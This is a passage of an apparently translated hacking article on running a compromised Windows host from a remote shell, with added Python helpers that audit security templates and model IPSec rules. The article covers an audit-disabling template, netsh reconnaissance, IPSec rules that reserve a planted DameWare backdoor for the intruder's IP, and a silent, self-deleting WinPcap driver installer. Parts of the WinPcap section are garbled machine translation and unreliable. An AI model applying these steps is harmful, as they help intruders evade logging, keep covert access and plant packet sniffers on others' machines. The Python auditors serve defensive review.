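    """secedit templates are INI files; '=' is the only delimiter and keys are case-insensitive."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    return cp


def audit_template(text: str) -> List[Dict[str, str]]:
    """Return one finding per weakening the template would apply."""
    cp = load_template(text)
    findings: List[Dict[str, str]] = []

    def add(section: str, key: str, value: str, issue: str) -> None:
        findings.append({"section": section, "key": key, "value": value, "issue": issue})

    if cp.has_section("Event Audit"):
        for key, val in cp.items("Event Audit"):       # configparser lower-cases the keys
            if key.startswith("audit") and val.strip().isdigit():
                level = int(val)
                if level == 0:
                    add("Event Audit", key, val, "set to 0 (no auditing): these events never reach the Security log")
    if cp.has_section("System Access"):
        sa = {k: v.strip() for k, v in cp.items("System Access")}
        length = sa.get("minimumpasswordlength")
        if length is not None and int(length) < MIN_PASSWORD_LENGTH:
            add("System Access", "MinimumPasswordLength", length, f"below baseline of {MIN_PASSWORD_LENGTH}")
        if sa.get("passwordcomplexity", "1") != "1":
            add("System Access", "PasswordComplexity", sa["passwordcomplexity"], "complexity requirement disabled")
    if cp.has_section("Registry Values"):
        for key, val in cp.items("Registry Values"):   # value is "<reg type>,<data>"
            _, _, data = val.partition(",")
            if key.endswith(r"\lsa\forceguest") and data.strip() == "0":
                add("Registry Values", key, val,
                    "ForceGuest=0 (classic model): network logons with local admin credentials get full rights")
    return findings


# Constructed: the article's audit-off template, gp.inf and ForceGuest inf merged into one.
SAMPLE_TEMPLATE = r"""[version]
signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
[Event Audit]
AuditSystemEvents=0
AuditObjectAccess=0
AuditPrivilegeUse=0
AuditPolicyChange=0
AuditAccountManage=0
AuditProcessTracking=0
AuditDSAccess=0
AuditAccountLogon=0
AuditLogonEvents=0
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
"""

# Constructed counterpart that keeps auditing on and the XP default sharing model.
HARDENED_TEMPLATE = r"""[version]
signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 12
PasswordComplexity = 1
[Event Audit]
AuditLogonEvents=3
AuditAccountLogon=3
AuditPolicyChange=3
AuditAccountManage=3
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,1
"""

if __name__ == "__main__":
    for f in audit_template(SAMPLE_TEMPLATE):
        print(f"[{f['section']}] {f['key']}={f['value']}: {f['issue']}")
```

On SAMPLE_TEMPLATE the function reports eleven findings (nine audit categories, the short password length and the ForceGuest change); HARDENED_TEMPLATE reports none. Because the audit policy does not live in the registry, as the text above notes, comparing exported templates is the practical way to spot such a change after the fact.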

Network configuration
Windows has many built-in network command-line tools, such as the familiar ping, tracert, ipconfig, telnet, ftp, tftp and netstat, and the less familiar nbtstat, pathping, nslookup, finger, route, netsh...
These commands fall into three categories: network testing such as ping, network connection such as telnet, and network configuration such as netsh. The first two are relatively simple; this article only describes the two network configuration tools.

netsh
Using netsh in a remote shell first requires solving an interaction problem. As mentioned above, many shells cannot redirect their output again, so in this environment command-line tools such as ftp cannot be used interactively. The solution is that interactive tools generally accept a script or response file, such as ftp -s:filename. netsh is the same: netsh -f filename.

The netsh command is very large; it can configure IAS, DHCP, RAS, WINS, NAT servers, the TCP/IP protocol, the IPX protocol, routing and so on. We are not administrators and generally don't need to know that much; we just use netsh to learn the target host's network configuration.

1. TCP/IP configuration

echo interface ip >s
echo show config >>s
netsh -f s
del s

This tells you how many network cards and IPs the host has, whether the IP is dynamically assigned (DHCP), and what the internal IP is, if any.
This command is almost the same as ipconfig /all.

Note that the following commands require the remoteaccess service to be running on the target host. If it is disabled, first lift the disable by importing the registry, then
net start remoteaccess

2. ARP

echo interface ip >s
echo show ipnet >>s
netsh -f s
del s

This gives a little more information than arp -a.

3. TCP/UDP connections

echo interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
netsh -f s
del s

This group of commands is equivalent to netstat -an.

4. Network card information
If every netsh command can be replaced by some other command, why is it needed at all? The following one has no substitute.

echo interface ip >s
echo show interface >>s
netsh -f s
del s

Other netsh functions, such as changing the IP, are generally unnecessary; once the IP is changed you may be left with no way back in ("calling on heaven and earth, and neither answers"), so they are all skipped.

IPSec
First, note that IPSec and TCP/IP filtering are different things; don't confuse them. TCP/IP filtering is very limited, far less flexible and powerful than IPSec. The following discusses how to control IPSec from the command line.

XP uses ipseccmd, 2000 uses ipsecpol. Unfortunately neither ships with the system. ipseccmd is in SUPPORT\TOOLS\SUPPORT.CAB on the XP installation disk, ipsecpol in the 2000 Resource Kit. Moreover, ipsecpol requires two additional files: ipsecutil.dll and text2pol.dll. The three files total 119KB.

IPSec is controlled through Group Policy, but I searched MSDN and could not find the corresponding security template syntax, and configured IPSec policies cannot be exported as templates. So Group Policy is a dead end. IPSec settings are saved in the registry (HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local), so in theory IPSec can be configured by modifying the registry. But much of the information is stored in binary form and is very hard to read and modify. By comparison, uploading the command-line tools is more convenient.

A lot of information on ipsecpol and ipseccmd can be found online, so this article won't elaborate and just gives some practical examples.
For setting IPSec policy, the ipseccmd syntax is almost identical to ipsecpol, so only ipsecpol is used in the examples:

1. Defending against rpc-dcom attacks

ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x

This command closes the local host's TCP ports 135, 139, 445 and UDP ports 135, 137, 138, 445.
The specific meaning is as follows:
-p myfirewall  the policy name is myfirewall
-r rpc-dcom  the rule name is rpc-dcom
-f ...  creates 7 filters. * means any address (source); 0 means this machine's address (destination); + means a mirrored (bidirectional) filter. For the detailed syntax see ipsecpol -?
-n BLOCK  the filter action is "block". Note that BLOCK must be uppercase.
-w reg  writes the configuration to the registry so it stays valid after a restart.
-x  activates the policy immediately.

2. Preventing ping

ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x

If a policy named myfirewall already exists, the antiping rule is added to it.
Note that this rule also prevents the host from pinging others.

3. IP restrictions for a backdoor
Suppose you have installed DameWare Mini Remote Control on a host. To protect it from others brute-forcing its password or exploiting an overflow, access to its service port 6129 should be restricted.

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x

Now only 123.45.67.89 can access port 6129 on the host.
If you have a dynamic IP, set the rules according to the range of IPs assigned. For example:

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.+0:6129:tcp -n PASS -w reg -x

This allows IPs 123.45.67.1 to 123.45.67.254 to access port 6129.
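The BLOCK-everything-then-PASS-one-address pattern depends on IPSec giving a filter with a specific source address precedence over a filter for any address. To reason about a filter set before activating it, here is an added example (not from the article, and not the ipsecpol tool's own code) that parses the src+dst:port:proto filter syntax exactly as it appears above and decides PASS or BLOCK for an inbound connection. Precedence is modelled as a simple specificity score (exact host > trailing-dot subnet > any, then a specific port over any), which is a simplification of the real IPSec filter weighting; the rule lists are the article's examples, and the addresses fed to locked_out() are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

Rule = Tuple[str, str, str]   # (rule name, filter spec, action "BLOCK"/"PASS")


@dataclass
class Filter:
    """One ipsecpol -f filter: src{+|=}dst[:port[:proto]], as used in the examples above."""
    src: str             # "*" any, "0" this host, "1.2.3.4" exact, "1.2.3." trailing-dot subnet
    dst: str
    port: Optional[int]  # destination port; None = any
    proto: str           # "tcp", "udp", "icmp" or "any"
    mirrored: bool       # "+" also builds the reverse-direction filter


def parse_filter(spec: str) -> Filter:
    m = re.fullmatch(r"([^+=]+)([+=])([^:]*)(?::(\d*))?(?::(\w*))?", spec)
    if not m:
        raise ValueError(f"unrecognised filter: {spec}")
    src, op, dst, port, proto = m.groups()
    return Filter(src, dst, int(port) if port else None, (proto or "any").lower(), op == "+")


def addr_matches(pattern: str, ip: str) -> bool:
    if pattern == "*":
        return True
    if pattern.endswith("."):            # 123.45.67. covers 123.45.67.x
        return ip.startswith(pattern)
    return pattern == ip


def specificity(f: Filter) -> Tuple[int, int]:
    """Higher wins: exact host > trailing-dot subnet > any; then a fixed port over any port."""
    addr = 1 if f.src == "*" else (2 if f.src.endswith(".") else 3)
    return (addr, 1 if f.port is not None else 0)


def inbound_decision(rules: List[Rule], src_ip: str, port: int, proto: str) -> str:
    """PASS or BLOCK for a packet from src_ip to this host ("0") on port/proto."""
    best = None
    for name, spec, action in rules:
        f = parse_filter(spec)
        if f.dst != "0" or not addr_matches(f.src, src_ip):
            continue                       # only inbound-to-this-host filters are modelled
        if f.port is not None and f.port != port:
            continue
        if f.proto != "any" and f.proto != proto.lower():
            continue
        key = specificity(f)
        if best is None or key > best[0]:
            best = (key, action, name)
    return best[1] if best else "PASS"     # no matching filter: IPSec leaves the traffic alone


def locked_out(rules: List[Rule], admin_ips: List[str], port: int, proto: str) -> List[str]:
    """Administrator addresses that the rule set would refuse on port/proto."""
    return [ip for ip in admin_ips if inbound_decision(rules, ip, port, proto) == "BLOCK"]


def describe(spec: str) -> str:
    f = parse_filter(spec)
    src = "any address" if f.src == "*" else (f"subnet {f.src}x" if f.src.endswith(".") else f"host {f.src}")
    dst = "this host" if f.dst == "0" else f.dst
    port = f"port {f.port}" if f.port is not None else "any port"
    return f"{src} -> {dst}, {f.proto} {port}" + (", mirrored" if f.mirrored else "")


# The article's rule sets.
MYFW: List[Rule] = [("dwmrc_block_all", "*+0:6129:tcp", "BLOCK"),
                    ("dwmrc_pass_me", "123.45.67.89+0:6129:tcp", "PASS")]
MYFW_SUBNET: List[Rule] = [("dwmrc_block_all", "*+0:6129:tcp", "BLOCK"),
                           ("dwmrc_pass_me", "123.45.67.+0:6129:tcp", "PASS")]
RPC_DCOM: List[Rule] = [("rpc-dcom", s, "BLOCK") for s in (
    "*+0:135:tcp", "*+0:135:udp", "*+0:137:udp", "*+0:138:udp", "*+0:139:tcp", "*+0:445:tcp", "*+0:445:udp")]

if __name__ == "__main__":
    for _, spec, action in MYFW:
        print(f"{action:5} {describe(spec)}")
    print("locked out:", locked_out(MYFW, ["123.45.67.89", "10.0.0.5"], 6129, "tcp"))
```

With the two myfw rules, 123.45.67.89 is admitted on 6129/tcp and 10.0.0.5 is refused, while port 80 from either address is untouched because no filter matches it; with the subnet form, 123.45.67.200 passes and 123.45.68.1 is blocked. Checking the administrator's own address with locked_out() before the -x step is the programmatic form of the precaution the article gives next.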

When writing rules, be particularly careful not to block yourself. If you are unsure whether a rule does what you expect, you can first schedule a task as a "way back". For example:

c:\>net start schedule
The Task Scheduler service is starting.
The Task Scheduler service was started successfully.

c:\>time /t
12:34

c:\>at 12:39 ipsecpol -p myfw -y -w reg
Added a new job with job ID = 1

Then you have 5 minutes to set up a myfw policy and test it. After 5 minutes, the scheduled task stops the policy.
If the test result is not satisfactory, delete the policy.

c:\>ipsecpol -p myfw -o -w reg

Note that before deleting a policy you must first make sure it is stopped. If it is not stopped, it remains in force for a while even after deletion; the duration depends on the policy refresh interval, which defaults to 180 minutes.

If the test passes, enable it.

c:\>ipsecpol -p myfw -x -w reg

Finally, ways of viewing IPSec policy.
On XP it is very simple; one command does it: ipseccmd show filters
ipsecpol has no query function, so you need the command-line tool netdiag, located in SUPPORT\TOOLS\SUPPORT.CAB on the 2000 installation disk. (Having already uploaded three files, one more doesn't matter. ^_^)

netdiag needs the RemoteRegistry service, so start that service first:

net start remoteregistry

Without RemoteRegistry running you get an error:

[FATAL] Failed to get system information of this machine.

netdiag is a very powerful tool; all network-related information can be obtained with it! However, its output is sometimes too detailed and exceeds the output buffer of the cmd.exe console, and not every remote cmd shell can paginate with the more command.

The command to view IPSec policy is:
netdiag /debug /test:ipsec

Then comes a long string of output; the IPSec policy is at the end.

Software installation
A software/tool of the installation process, and in General just do two things: copy the file to a specific directory and modify the registry. As long as clear the specific content, then you can own at the command line. Regardless of the installation after the required registration activation, etc.

WinPcap is a very commonly used tool, but it must be in a window screen installation. Online can also be found without a GUI version, but still has a colophon, and in fact, we can totally do it yourself one.

To WinPcap 3.0 a, for example. By comparing before and after installation of the file system and registry snapshot, it is easy to understand the entire installation process.
Remove the anti-mounted part, the key documents are three: wpcap.dll that packet.dll 和 npf.sys the. The previous two files are located in the system32 directory, and the third one in system32\drivers. While the registry of the changes is to increase a system service NPF. Note that is a system service that is Drive is not a Win32 service.

As a system service, not only in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services Add a primary key, in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root under the also increase the primary key. The latter default only the SYSTEM status can only be modified. Fortunately, it does not need to manually add it, winpcap is invoked automatically when done. Or even completely without manually modifying the registry, all of the things that winpcap will yourself to finish, you only need the three files copied to the appropriate location on the line.

As an example, or show you how to modify the registry: using said in front of the inf file to achieve.

[Version]
Signature=“$WINDOWS NT$”
[DefaultInstall. Services]
AddService=NPF,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys

Save the above as wpcap.inf (ServiceType 0x1 is a kernel driver, StartType 3 is demand start, and %12% expands to the drivers directory).
Then write a batch file wpcap.bat:

rem 128 = use the inf's own directory as the source path and do not reboot
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\wpcap.inf
del wpcap.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0

Then use WinRAR to pack all five files (wpcap.inf, wpcap.bat, packet.dll, wpcap.dll and npf.sys) into a self-extracting exe and, under "Advanced SFX options" -> "Run after extraction", enter wpcap.bat. The result is a command-line WinPcap installer.

Note that the last line of the batch file must not be followed by a carriage return. Otherwise the batch file is still being executed when it reaches del %0 and cannot delete itself.

This idea applies to basically all software, with one exception: system patches.
A patch is likely to replace files that are currently being executed or are open, so a plain copy does not work.
Fortunately, Windows patches support command-line installation.
For example:

KB824146.exe -n -z -q

-n do not keep a backup (no uninstall)
-z do not restart
-q quiet mode

If there is a whole batch of patches to apply, pack them with RAR into a self-extracting file together with a batch file such as this (KB*.exe rather than KB???.exe, since a KB number has more than three digits):

for %%f in (KB*.exe) do %%f -n -z -q
for %%f in (KB*.exe) do del %%f
del %0

Windows Script
Many things are very easy to do with a script. Below are a few commonly used scripts in "echo" form, that is, as the commands that write the .vbs file from the command line and then run it with cscript.

1. Display the system version

@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

2. Enumerate processes

@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

3. Terminate a process

@echo for each ps in getobject _ >pk.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs

To terminate the process with PID 123, use the following syntax:
cscript //nologo pk.vbs 123

If it prints 0, the termination succeeded (Terminate returns 0 on success; nothing is printed if no process has that PID).

Afterwards:
del pk.vbs

4. Restart the system

@echo for each os in getobject _ >rb.vbs
@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs

The {(shutdown)} part of the moniker requests the shutdown privilege. The argument 2 means reboot; 1 is shutdown and 8 is power off, and adding 4 forces the operation even if applications do not respond.

5. List auto-start services

@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.startmode="Auto" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

6. List running services

@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.state="Running" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

7. Display the last boot time

@echo for each os in getobject _ >bt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

The result is in CIM_DATETIME format:
yyyymmddHHMMSS.mmmmmm+UUU
year, month, day, hour, minute, second, then six digits of microseconds, then the sign and the offset from UTC in minutes (for example +480 for UTC+8).

8. Display the system uptime

@echo for each os in getobject _ >rt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint(r)^&"d "^&t\3600^&"h "^&t\60 mod 60^&"m "^&t mod 60^&"s":next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs

The script drops the last seven digits of the 100 ns tick count to get seconds, then divides by 86400 one digit at a time (a long division on the string) because a VBScript Long is only 32 bits and the seconds value may not fit. This uptime comes from a 64-bit performance counter, so it does not suffer the 49.7-day wraparound of the 32-bit millisecond tick count.
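Two helpers for the timestamps in items 7 and 8, as an added Python example (not from the original article): parse_cim_datetime converts the CIM_DATETIME form shown above into a timezone-aware datetime, and the uptime helpers turn a 64-bit 100 ns tick count, or the difference between LastBootUpTime and LocalDateTime (both Win32_OperatingSystem properties in CIM_DATETIME form), into days, hours, minutes and seconds. Python integers are unbounded, so the digit-by-digit long division the VBScript needs to stay within its 32-bit Long is not required here. The two timestamp strings are constructed sample values.

```python
"""CIM_DATETIME parsing and uptime arithmetic for WMI output.

Added example, not part of the original article. Sample timestamps are constructed.
"""
from datetime import datetime, timedelta, timezone


def parse_cim_datetime(s):
    """Parse yyyymmddHHMMSS.mmmmmm+UUU (UUU = offset from UTC in minutes).

    Interval values and '*' wildcard fields, which WMI also allows, are rejected.
    """
    if len(s) != 25 or s[14] != "." or s[21] not in "+-" or not s[22:].isdigit():
        raise ValueError("not an absolute CIM_DATETIME: %r" % s)
    base = datetime.strptime(s[:21], "%Y%m%d%H%M%S.%f")
    minutes = int(s[22:])
    if s[21] == "-":
        minutes = -minutes
    return base.replace(tzinfo=timezone(timedelta(minutes=minutes)))


def uptime_from_100ns(ticks):
    """Split a 64-bit count of 100 ns intervals into (days, hours, minutes, seconds)."""
    secs = ticks // 10_000_000          # drop the last seven digits, as the VBScript does
    days, secs = divmod(secs, 86400)
    hours, secs = divmod(secs, 3600)
    minutes, secs = divmod(secs, 60)
    return days, hours, minutes, secs


def uptime_between(boot_cim, now_cim):
    """Uptime from LastBootUpTime and LocalDateTime, both as CIM_DATETIME strings.

    Both values are converted to aware datetimes first, so differing UTC offsets
    (e.g. a DST change since boot) do not skew the result.
    """
    delta = parse_cim_datetime(now_cim) - parse_cim_datetime(boot_cim)
    return uptime_from_100ns(int(delta.total_seconds()) * 10_000_000)


def format_uptime(parts):
    """Render the tuple in the same 'Nd Nh Nm Ns' style the VBScript prints."""
    return "%dd %dh %dm %ds" % parts


# Constructed sample values as Win32_OperatingSystem would report them on a UTC+8 host.
SAMPLE_BOOT = "20090520233015.125000+480"
SAMPLE_NOW = "20090521120000.000000+480"

if __name__ == "__main__":
    print("booted:", parse_cim_datetime(SAMPLE_BOOT).isoformat())
    print("uptime:", format_uptime(uptime_between(SAMPLE_BOOT, SAMPLE_NOW)))
    # A tick count past the 32-bit millisecond limit still converts cleanly.
    print("49.7 days in ticks:", format_uptime(uptime_from_100ns(2**32 * 10_000)))
```

With real data, feed the strings from `wscript.echo os.lastbootuptime` and `wscript.echo os.localdatetime` to uptime_between; if the two offsets differ because the clock crossed a DST boundary, the aware-datetime subtraction still yields the true elapsed time.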